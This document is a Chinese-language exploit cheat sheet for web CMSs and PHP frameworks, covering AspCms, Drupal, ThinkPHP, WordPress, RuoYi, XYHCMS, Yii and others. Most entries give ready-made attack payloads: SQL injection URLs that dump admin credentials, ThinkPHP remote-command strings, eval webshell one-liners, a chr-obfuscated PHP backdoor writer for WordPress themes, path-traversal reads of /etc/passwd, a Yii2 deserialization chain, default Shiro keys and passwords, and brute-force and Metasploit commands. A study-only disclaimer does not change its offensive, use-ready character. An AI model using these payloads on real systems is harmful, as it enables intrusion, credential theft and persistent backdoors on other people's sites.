B/S - Exploits

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

大纲

各类论坛/CMS框架
框架引擎中间件
组件
服务
OA
邮服
Other

各类论坛/CMS框架

什么是 CMS

内容管理系统 (CMS) 是一种存储所有数据 (如文本,照片,音乐,文档等) 并在你的网站上提供的软件. 它有助于编辑,发布和修改网站的内容.

工具包

SecWiki/CMS-Hunter - CMS 漏洞测试用例集合
Q2h1Cg/CMS-Exploit-Framework - 一款 CMS 漏洞利用框架，通过它可以很容易地获取、开发 CMS 漏洞利用插件并对目标应用进行测试。
Lucifer1993/AngelSword - Python3 编写的 CMS 漏洞检测框架
foospidy/web-cve-tests - A simple framework for sending test payloads for known web CVEs.

74CMS

骑士 CMS 6.0.48以下文件包含getshell

相关文章
- 骑士cms文件包含getshell复现

AEN

相关工具

0ang3el/aem-hacker

aspcms

fofa: Powered by AspCms2

AspCms1.5 版以下注入漏洞

POC | Payload | exp

# 爆用户名 EXP
http://www.***.com/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

这是爆 ID=1 的账户名，如果发现权限不够可以往后试 2,3,4………..

# 爆密码
http://www.xxx.com/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

后台登录地址：/admin/login.asp

后台拿 shell

1. 直接上传`.asp;x`
2. 系统配置信息
3. 模版管理新建 `1.asp` 模板，内容写马的内容.

AspCms2.1.4 GBK 版,未验证权限、且存在注入漏洞

POC | Payload | exp

admin/_content/_About/AspCms_AboutEdit.asp

http://www.xxx.com/admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1

AspCms2.0未验证权限，且存在注入漏洞

POC | Payload | exp

admin/_content/_About/AspCms_AboutEdit.asp?id=19

表名：aspcms_user
列名：loginname、password

http://www.xxx.com/admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,password,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1

Cookies 欺骗

POC | Payload | exp

cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9

进入后台后GetShell

POC | Payload | exp
所有版本存在后台编辑风格可以修改任意文件，获取webshell就很简单了
```
http://www.xxx.com/AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp
```
插入asp;x文件蚁剑连接即可。

dedeCMS

官网 : http://www.dedecms.com/

相关工具

lengjibo/dedecmscan - 织梦全版本漏洞扫描工具

相关文章

5.8.1 rce

相关文章
- Chasing a Dream :: Pre-authenticated Remote Code Execution in Dedecms
- DedeCMS 未授权RCE漏洞原理及影响面分析

SRC-2021-0029 : Dedecms GetCookie Type Juggling Authentication Bypass Vulnerability

影响版本
- Dedecms <= v5.7.84 release
POC | Payload | exp
- https://srcincite.io/pocs/src-2021-0029.py.txt

Discuz

官网 : https://www.discuz.net/forum.php https://gitee.com/Discuz/DiscuzX

相关文章

CVE-2018-14729

描述
Discuz！1.5 至 2.5 中的 source/admincp/admincp_db.php 中的数据库备份功能允许远程攻击者执行任意 PHP 代码。
影响版本
- Discuz! 1.5 ~ 2.5
相关文章
- Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729)
POC | Payload | exp
- FoolMitAh/CVE-2018-14729

DiscuzX 3.4 SSRF

相关文章
- 实例分析 DiscuzX 3.4 SSRF漏洞
- Discuz x3.4前台SSRF

Discuz!ML

官网 : https://discuz.ml/

discuzml-v-3-x-code-injection-vulnerability

POC | Payload | exp
- theLSA/discuz-ml-rce

CVE-2019-13956

描述
该漏洞存在 discuz ml(多国语言版)中,cookie 中的 language 可控并且没有严格过滤,导致可以远程代码执行。
影响版本
- Discuz! ML V3.2
- Discuz! ML V3.3
- Discuz! ML V3.4
相关文章
- Discuz! ML远程代码执行(CVE-2019-13956)
- Discuz!ML V3.X 代码注入分析

Drupal

官网 : https://www.drupal.org/

Tips

对'/node/$'进行Fuzz，其中'$'是一个数字(从1到500)。⽐如说："/node/$"。

CVE-2014-3704 “Drupalgeddon” SQL 注入漏洞

描述
Drupal 7.0~7.31 版本中存在一处无需认证的 SQL 漏洞。通过该漏洞，攻击者可以执行任意 SQL 语句，插入、修改管理员信息，甚至执行任意代码。
影响版本
- Drupal 7.0 ~ 7.31
POC | Payload | exp
- https://vulhub.org/#/environments/drupal/CVE-2014-3704/
- https://www.exploit-db.com/exploits/34992

MSF Module

use exploit/multi/http/drupal_drupageddon
set RHOSTS [ip]
run

CVE-2017-6920 Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞

描述
2017年6月21日,Drupal 官方发布了一个编号为 CVE-2017- 6920 的漏洞,影响为 Critical.这是 Drupal Core 的 YAML 解析器处理不当所导致的一个远程代码执行漏洞,影响 8.x 的 Drupal Core.
影响版本
- Drupal 8.x
相关文章
- CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造
- Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞 (CVE-2017-6920)

CVE-2018-7600 Drupal Drupalgeddon 2 远程代码执行漏洞

描述
Drupal 是一款用量庞大的 CMS，其 6/7/8 版本的 Form API 中存在一处远程代码执行漏洞。
影响版本
- Drupal 6/7/8
POC | Payload | exp

MSF Module

use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS [ip]
run

CVE-2018-7602 远程代码执行漏洞

影响版本
- Drupal 7.x
- Drupal 8.x
POC | Payload | exp
- Drupal 远程代码执行漏洞(CVE-2018-7602)
- CVE-2018-7600/drupa7-CVE-2018-7602.py

CVE-2019-6339 远程代码执行漏洞

描述
phar 反序列化 RCE
影响版本
- Drupal 7.0 ~ 7.62
- Drupal 8.5.0 ~ 8.5.9
- Drupal 8.6.0 ~ 8.6.6
相关文章
- Drupal 1-click to RCE 分析
POC | Payload | exp
- https://vulhub.org/#/environments/drupal/CVE-2019-6339/

CVE-2019-6341 XSS

描述
通过文件模块或者子系统上传恶意文件触发 XSS 漏洞
影响版本
- Drupal 7.0 ~ 7.65
- Drupal 8.5.0 ~ 8.5.14
- Drupal 8.6.0 ~ 8.6.13
相关文章
- Drupal 1-click to RCE 分析
POC | Payload | exp
- https://vulhub.org/#/environments/drupal/CVE-2019-6341/

CVE-2020-28948

相关文章
- Drupal(CVE-2020-28948/CVE-2020-28949)分析

ECshop

官网 : http://www.ecshop.com/

ECShop 是一款 B2C 独立网店系统,适合企业及个人快速构建个性化网上商店.系统是基于 PHP 语言及 MYSQL 数据库构架开发的跨平台开源程序.

ECShop 2.x/3.x SQL 注入/任意代码执行漏洞

描述
其2017年及以前的版本中,存在一处 SQL 注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞.其 3.6.0 最新版已修复该漏洞.
影响版本
- ECShop 2.x/3.x
相关文章
- ECShop 2.x/3.x SQL注入/任意代码执行漏洞
- ecshop2.x 代码执行

ecshop后台getshell

相关文章
- ecshop后台getshell

Fastadmin

项目: https://github.com/karsonzhang/fastadmin

FastAdmin 是一款基于 ThinkPHP5+Bootstrap 开发的极速后台开发框架。FastAdmin 基于 Apache2.0 开源协议发布，目前被广泛应用于各大行业应用后台管理。

Fastadmin 前台 Getshell

相关文章
- fastadmin最新版前台getshell漏洞

Laravel

Fofa: app="Laravel-Framework"

相关文章

Laravel 6.x/7.x的一条执行代码的反序列化利用链

env 泄露

POC | Payload | exp
```
/.env
```

日志泄露

POC | Payload | exp
```
/storage/logs/laravel.log
```

Debug模式

POC | Payload | exp
```
/logout
/param[]=0
```

Laravel PHPUnit Remote Code Execution

影响版本
- Before 4.8.28 and 5.x before 5.6.3

POC | Payload | exp

curl -d "<?php echo php_uname(); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

CVE-2021-3129 Laravel Debug 页面 RCE

相关文章
POC | Payload | exp
- ambionics/laravel-exploits

Laravel 8.x image upload bypass

相关文章
- Laravel 8.x image upload bypass

jeecg

fofa: app="JEECG"

相关文章

JAVA代码审计-JEECG快速开发平台(一)

密码重置

POC | Payload | exp
- 当访问loginController.do?goPwdInit 或 pwdInit时，即使用户已经修改过密码，admin的密码仍会被重置为123456。

sessionid 信息泄露

POC | Payload | exp

http://localhost:8080/webpage/system/druid/websession.json

文件上传

POC | Payload | exp

/jeecgFormDemoController.do?commonUpload

jeewms

Fofa: body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro" && body="仓"

未授权任意文件读取漏洞

POC | Payload | exp

http://x.x.x.x:8088/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini
http://x.x.x.x:8020/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd

Joomla

官网 : https://www.joomla.org/

相关工具

rezasp/joomscan - 效果很差,没啥用

CVE-2017-8917 Joomla! 3.7 Core SQL 注入

描述
Joomla 于5月17日发布了新版本 3.7.1,本次更新中修复一个高危 SQL 注入漏洞,成功利用该漏洞后攻击者可以在未授权的情况下进行 SQL 注入。
影响版本
- joomla 3.7.0
相关文章
- Joomla! 3.7 Core SQL 注入 (CVE-2017-8917)漏洞分析

POC | Payload | exp

http://你的 IP 地址:端口号/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

sqlmap payload

sqlmap -u "http://192.168.1.1/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -T '#__users' -C name,password --dump

CVE-2021-23132

POC | Payload | exp
- HoangKien1020/CVE-2021-23132

Maccms

Maccms v10后门

POC | Payload | exp

http://www.360doc.com/content/20/0203/14/30583588_889434397.shtml

maccms10\extend\upyun\src\Upyun\Api\Format.php
maccms10\extend\Qcloud\Sms\Sms.php
密码 WorldFilledWithLove

MetInfo

官网: https://www.metinfo.cn/

相关文章

CVE-2018-13024

描述
远程攻击者可通过向 admin/column/save.php 文件发送 module 参数利用该漏洞向 .php 文件写入代码并执行该代码.
影响版本
- MetInfo 5.3.16
- MetInfo 6.0.0
相关文章
- CVE-2018-13024复现及一次简单的内网渗透
POC | Payload | exp
- admin/column/save.php?name=123&action=editor&foldername=upload&module=22;@eval($_POST[1]);/*

October

官网: http://octobercms.com

October CMS 1.0.412 - Multiple Vulnerabilities

POC | Payload | exp
- October CMS 1.0.412 - Multiple Vulnerabilities

pBootCMS

pBootCMS 3.0.4 前台注入

相关文章
- pBootCMS 3.0.4 前台注入漏洞复现

php7cms

文件包含漏洞

相关文章
- php7cms 文件包含漏洞

PHPMyWind

相关文章

PHPMyWind 5.3 - Cross-Site Scripting

POC | Payload | exp
- https://www.exploit-db.com/exploits/42535

RuoYi

Fofa: app="若依-管理系统"

默认口令

admin/admin123

后台任意文件读

影响版本
- RuoYi <= v4.5.0

POC | Payload | exp

/common/download/resource?resource=/profile/../../../../etc/passwd

druid 未授权访问

POC | Payload | exp
```
/prod-api/druid/index.html
```

默认shiro key

fCq+/xW488hMTCD+cmJ3aQ==
zSyK5Kp6PZAAjlT+eeNMlg==

4.6.1 后台注入

相关文章
- Xcheck Java引擎漏洞挖掘&防护识别

POC | Payload | exp

POST /ruoyi/system/user/list HTTP/1.1
POST /ruoyi/system/user/export HTTP/1.1
POST /ruoyi/system/Allocated/list HTTP/1.1
POST /ruoyi/system/role/list HTTP/1.1
POST /ruoyi/system/dept/list HTTP/1.1

params[dataScope]=a

4.6.2 后台RCE

相关文章
- 记一次若依cms后台getshell
  - bkfish/yaml-payload-for-Win - 用于windows反弹shell的yaml-payload
- 若依CMS4.6.0后台RCE
- 若依CMS后台getshell
POC | Payload | exp
- lz2y/yaml-payload-for-ruoyi
- passer-W/Ruoyi-All - 若依后台定时任务一键利用

SeaCMS

Fofa: app="海洋CMS"

CVE-2020-21378 后台SQL注入漏洞

描述
攻击者可通过对admin_members_group.php的编辑操作中的id参数利用该漏洞进行SQL注入攻击。

POC | Payload | exp

/admin_members_group.php?action=edit&id=2%20and%20if(mid(user(),1,1)=%27r%27,concat(rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27))%20RLIKE%20%27(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2bcd%27,1)

ShopXO

CNVD-2021-15822 任意文件读取漏洞

相关文章
- ShopXO download 任意文件读取漏洞 CNVD-2021-15822

Sitecore

fofa : "Sitecore Experience Platform"

Sitecore rce

相关文章
- Sitecore Experience Platform Pre-Auth RCE

SiteServer

相关文章

找回密码

管理员的 “密码找回问题答案” 为非强制项，一般都留空。此时如果在密码找回页面，输入空密码找回答案，就可以获得当前管理员的密码明文(页面有做 javascript 限制答案长度不能为 0，但禁用 javascript 即可绕过)

访问 /siteserver/forgetPassword.aspx, 然后禁止 Javascript。输入用户名，获取密码

6.8.3 验证码绕过 & 后台多处注入

相关文章
- 某Server CMS最新6.8.3版本验证码绕过&后台多处注入

POC | Payload | exp

POST /api/v1/administrators/actions/login HTTP/1.1
{"account":"admin","password":"7fef6171469e80d32c0559f88b377245","isAutoLogin":true}

GET /SiteServer/settings/pageAdministrator.aspx?areaId=0&departmentId=0&keyword=1&lastActivityDate=3&order=1%2C(select%20case%20when%20(3*2*1=6%20AND%2000043=00043)%20then%201%20else%201*(select%20table_name%20from%20information_schema.tables)end)=1&pageNum=50&roleName= HTTP/1.1

GET /SiteServer/settings/pageUser.aspx?creationDate=0&groupId=-1&keyword=&lastActivityDate=0&loginCount=0&pageNum=0&searchType=if(now()=sysdate()%2Csleep(0)%2C0) HTTP/1.1

SiteServer CMS 远程模板下载 Getshell 漏洞

相关文章
- 简记野生应急捕获到的siteserver远程模板下载Getshell漏洞
POC | Payload | exp
- zhaoweiho/SiteServer-CMS-Remote-download-Getshell

ThinkAdmin

项目地址 : https://github.com/zoujingli/ThinkAdmin

ThinkAdminV6 任意文件操作 CVE-2020-25540

相关文章
- ThinkAdminV6 未授权访问and 任意文件查看漏洞复现

POC | Payload | exp

1、目录遍历注意 POST 数据包 rules 参数值需要 URL 编码
POST /admin.html?s=admin/api.Update/node
rules=%5B%22.%2F%22%5D

2、文件读取,后面那一串是 UTF8 字符串加密后的结果。计算方式在 Update.php 中的加密函数。
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34

ThinkCMF

官网: https://www.thinkcmf.com/

Fofa: title="ThinkCMF"

ThinkCMF 任意内容包含漏洞

相关文章
- ThinkCMF 任意内容包含getshell漏洞
POC | Payload | exp
- jas502n/ThinkCMF_getshell

ThinkPHP

官网: http://www.thinkphp.cn/

<5

相关文章

日志泄露

/Application/Runtime/Logs/Home/16_09_06.log # 其中 Application 可能会变，比如 App
/Runtime/Logs/Home/16_09_06.log             # 年份_月份_日期
/Runtime/Logs/User/16_09_06.log             # 年份_月份_日期

whirlwind110/tphack - Thinkphp3/5 Log 文件泄漏利用工具

5

相关文章

相关工具

Lucifer1993/TPscan - 一键 ThinkPHP 漏洞检测
theLSA/tp5-getshell - thinkphp5 rce 漏洞检测工具
sukabuliet/ThinkphpRCE - Thinkphp rce 扫描脚本，附带日志扫描
tangxiaofeng7/TPScan
bewhale/thinkphp_gui_tools - ThinkPHP 漏洞综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含, 宝塔绕过
```
java -Dfile.encoding="UTF-8" --module-path "C:\Program Files\Java\javafx-sdk-11.0.2\lib" --add-modules "javafx.controls,javafx.fxml,javafx.web" -jar "xxx.jar"
```

资源

Mochazz/ThinkPHP-Vuln - 关于 ThinkPHP 框架的历史漏洞分析集合
SkyBlueEternal/thinkphp-RCE-POC-Collection - thinkphp v5.x 远程代码执行漏洞-POC集合

日志泄露

/runtime/log/202004/1.log       # 年月/数字

whirlwind110/tphack - Thinkphp 3/5 Log 文件泄漏利用工具

thinkphp 5

/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
(post)public/index.php (data)c=exec&f=calc.exe&_method=filter

thinkphp 5.0.10(完整版)

(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system

thinkphp 5.0.21

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.0.22

/?s=.|think\config/get&name=database.username
/?s=.|think\config/get&name=database.password
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.0.23(完整版)

(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

thinkphp 5.0.23(完整版)debug模式

(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx

thinkphp 5.1.*

/?s=index/\think\Request/input&filter=phpinfo&data=1
/?s=index/\think\Request/input&filter=system&data=cmd
/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
(post)public/index.php (data)c=exec&f=calc.exe&_method=filter

thinkphp 5.2.*

(post)public/index.php (data)c=exec&f=calc.exe&_method=filter

未知版本未知版本

?s=index/\think\module/action/param1/${@phpinfo()}
?s=index/\think\Module/Action/Param/${@phpinfo()}
?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
index.php?s=/home/article/view_recent/name/1'

header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"

index.php?s=/home/shopcart/getPricetotal/tag/1%27
index.php?s=/home/shopcart/getpriceNum/id/1%27
index.php?s=/home/user/cut/id/1%27
index.php?s=/home/service/index/id/1%27
index.php?s=/home/pay/chongzhi/orderid/1%27
index.php?s=/home/pay/index/orderid/1%27
index.php?s=/home/order/complete/id/1%27
index.php?s=/home/order/complete/id/1%27
index.php?s=/home/order/detail/id/1%27
index.php?s=/home/order/cancel/id/1%27
index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+

POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"
1') union select sleep('''+str(sleep_time)+''')#

debug 信息泄露

相关文章
- 实战技巧|利用ThinkPHP5.X的BUG实现数据库信息泄露
- thinkphp5 mysql账号密码泄露漏洞

>5

thinkphp6 session 任意文件创建漏洞

相关文章
- thinkphp6 session 任意文件创建漏洞复现含POC

TPshop

目录遍历漏洞

相关文章
- 某shop 前台文件遍历&SSRF组合拳
- 某软件存在目录遍历漏洞

POC | Payload | exp

/index.php/Home/uploadify/fileList?type=.+&path=../../../

UCMS

CVE-2020-25483 后台文件上传漏洞

相关文章
- UCMS文件上传漏洞(CVE-2020-25483)复现

vBulletin

vBulletin 5.6.1 SQL 注入

http://localhost/vb5/ajax/api/content_attach/getIndexableContent"  -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=SQLi

获取管理员用户：

http://SITE/vb5/ajax/api/content_infraction/getIndexableContent"  -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,username,8,7,6,5,4,3,2,1+from+user+where+userid=1--

获取admin token：

http://SITE/vb5/ajax/api/content_infraction/getIndexableContent"  -H 'X-Requested-With: XMLHttpRequest' -d "nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,token,8,7,6,5,4,3,2,1+from+user+where+userid=1--

Weiphp

CNVD-2020-68596 前台文件任意读取

POC | Payload | exp
- Weiphp5.0 前台文件任意读取 CNVD-2020-68596

CNVD-2021-09693 Weiphp5.0 任意用户Cookie伪造

相关文章
- Weiphp5.0 任意用户Cookie伪造 CNVD-2021-09693

WordPress

官网 : https://wordpress.org/

WordPress 是一个开源的内容管理系统(CMS),允许用户构建动态网站和博客.

搭建教程

WordPress 搭建

Tips

默认的登录地址一般是 /wp-admin 或 /wp-login.php

相关工具

wpscanteam/wpscan - kali 自带,漏洞扫描需要 API Token,可扫用户、漏洞、目录,挺好用的

wpscan --url https://www.xxxxx.com/     # 直接扫描
wpscan --url https://www.xxxxx.com/ --enumerate u    # 枚举用户
wpscan --url https://www.xxxxx.com/ --passwords /tmp/password.txt   # 密码爆破
wpscan --url https://www.xxxxx.com/ --usernames admin --passwords out.txt  # 指定用户爆破
wpscan --url https://www.xxxxx.com/ --api-token xxxxxxxxCX8TTkkgt2oIY   # 使用 API Token,扫描漏洞
wpscan --url https://www.xxxxx.com/ -e vp --api-token xxxxxxx    # 扫描插件漏洞
wpscan --url https://www.xxxxx.com/ -e vt --api-token xxxxxxx    # 扫描主题漏洞

WPScan使用完整教程之记一次对WordPress的渗透过程

xmlrpc.php

xmlrpc.php 漏洞利用

查看系统允许的方法

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

账号爆破
一般情况下，wordpress 的管理后台都会设置账号登录失败次数限制，因此，可以通过 xmlprc.php 接口来进行爆破。通常会使用 wp.getUserBlogs、wp.getCategories 和 metaWeblog.getUsersBlogs 这个方法来进行爆破，也可以使用其他的方法。
```
POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>password</value></param>
</params>
</methodCall>
```

SSRF

WordPress 版本 ❤️.5.1, 通过 Pingback 可以实现的服务器端请求伪造 (Server-side request forgery，SSRF) 和远程端口扫描。

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探测的ip和端口：http://127.0.0.1:80</string></value>
</param><param><value><string>网站上一篇博客的URL：http://localhost/wordpress/?p=1)<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

WordPress 后台拿 SHELL

后台编辑404页面Getshell
"主题"-“编辑”-“404.php”
```
<script language="php">fputs(fopen(chr(46).chr(47).chr(99).chr(111).chr(110).chr(103).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(112).chr(97).chr(115).chr(115).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));</script>
```
插到文件头,404默认模板路径是：wp-content/themes/twentyten/404.php,其中"twentyten"目录是默认模板目录。更新完直接访问 localhost/wp-content/themes/twentyten/404.php 就会在twentyten目录生成一句话后门文件cong.php 密码pass，插入的代码是Chr加密，可自行编辑。(仔细看代码，文件名与一句话代码用" ,w "隔开了)
上传本地主题Getshell
本机建立目录“test”,可以直接把一句话放到index.php文件，再新建一个style.css样式文件(版本不同，上传时会判断是否存在"index.php"文件和"style.css"样式文件。)
打包test目录为zip文件。WP后台的主题管理，上传主题，安装。则你的后门路径为： localhost/wp-content/themes/test/index.php

CVE-2019-8942 & CVE-2019-8943 WordPress Crop-image Shell Upload

描述
此模块利用 WordPress 版本5.0.0和<= 4.9.8上的路径遍历和本地文件包含漏洞。裁剪图像功能允许用户(至少具有作者权限)通过在上载期间更改 _wp_attached_file 引用来调整图像大小并执行路径遍历。利用的第二部分将通过在创建帖子时更改 _wp_page_template 属性，将该图像包含在当前主题中。目前，此漏洞利用模块仅适用于基于 Unix 的系统。
影响版本
- wordpress < 4.9.9
- wordpress 5.0 ~ 5.0:rc3
POC | Payload | exp
- brianwrf/WordPress_4.9.8_RCE_POC: A simple PoC for WordPress RCE (author priviledge), refer to CVE-2019-8942 and CVE-2019-8943.
MSF Module
```
use exploit/multi/http/wp_crop_rce
```

WordPress <= 5.3.? DoS

POC | Payload | exp
- wordpress-dos-poc

CVE-2022-21661 WP_Query SQLinj

CVE-2022-21662 WordPress 5.8.2 Stored XSS Vulnerability

相关文章
- WordPress 5.8.2 Stored XSS Vulnerability
- CVE-2022-21662 WordPress核心框架存储型XSS漏洞分析与复现

插件漏洞

WordPress Plugin Mail Masta 1.0 - Local File Inclusion
- https://www.exploit-db.com/exploits/40290

XYHCMS

官网 : http://www.xyhcms.com/
fofa: app="XYHCMS"
fofa: icon_hash="-1300821702"

相关文章

后台路径

/xyhai.php

后台任意文件读取

POC | Payload | exp

http://127.0.0.1/xyhai.php?s=/Templets/edit/fname/Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGRiLnBocA==

CNVD-2020-03899 后台文件写入导致代码执行漏洞

POC | Payload | exp

后台,系统设置->网站设置->会员配置->禁止使用的名称
<?eval($_POST['cmd'])?>
http://localhost/App/Runtime/Data/config/site.php

后台文件写入导致代码执行漏洞2

POC | Payload | exp

后台,系统设置->网站设置,任意设置,在输入框内填 <?php phpinfo()?>
http://localhost/App/Runtime/Data/config/site.php

windows 版本文件上传漏洞

POC | Payload | exp

后台,系统设置->网站设置->上传配置->允许附件类型,添加类型 shell.php::$DATA
点击下面的 水印图片上传,之后会在图片部分显示上传路径，在windows下面，会自动忽略后面的::$DATA。

任意文件删除漏洞

POC | Payload | exp

http://domain/xyhai.php?s=/Database/delSqlFiles/sqlfilename/..\\..\\..\\install/install.lock

POST /xyhai.php?s=/Database/delSqlFiles/batchFlag/1

key[]=../../../install/install.lock

访问 http://domain/install 可以重装cms

后台任意文件下载

POC | Payload | exp

http://domain/xyhai.php?s=/Database/downFile/file/..\\..\\..\\App\\Common\\Conf\\db.php/type/zip

CNVD-2021-05552 反序列化

相关文章
- 痛失CVE之xyhcms(Thinkphp3.2.3)反序列化
- https://github.com/M00nBack/vulnerability/tree/main/xyhcms/XYHCMS前台反序列化

3.6 后台模版编辑rce

相关文章
- 行云海CMS之模板编辑防不胜防

Yii

官网 : https://www.yiichina.com/

Yii2 是一个高性能，基于组件的开源 PHP 框架，用于快速开发现代 Web 应用程序。

CVE-2020-15148 Yii 框架反序列化 RCE

描述
Yii Framework 2 在其 9月14 日发布的更新日志中公布了一个反序列化远程命令执行漏洞(CVE-2020-15148)。官方通过给yii\db\BatchQueryResult类加上__wakeup()函数，禁用了yii\db\BatchQueryResult的反序列化，阻止了应用程序对任意用户输入调用’unserialize()’造成的远程命令执行。
影响版本
- Yii2 Version < 2.0.38
相关文章
- CVE-2020-15148 Yii2反序列化RCE POP链分析

POC | Payload | exp

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'system';
            $this->id = 'ls -al';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters['close'] = [new CreateAction, 'run'];
        }
    }
}
namespace yii\db{
    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

Maskhe/CVE-2020-15148-bypasses

YxCMS

官网 : http://www.yxcms.net

常见路径

/index.php?r=admin  # 后台  默认管理员账号密码 admin 123456

YxCMS 1.4.7 多个漏洞

相关文章
- YxCMS 1.4.7 最新版漏洞分析

zcncms

相关文章

Zend

Fofa: app="ZF-Zend-Framework"

config 文件泄露

POC | Payload | exp
```
//application/configs/application.ini
```

五指cms

任意⽂件删除漏洞

相关文章
- ⼀次对五指 cms的任意⽂件删除漏洞挖掘

框架引擎中间件

相关文章

工具包

1120362990/vulnerability-list - 在渗透测试中快速检测常见中间件、组件的高危漏洞.
hatRiot/clusterd - application server attack toolkit
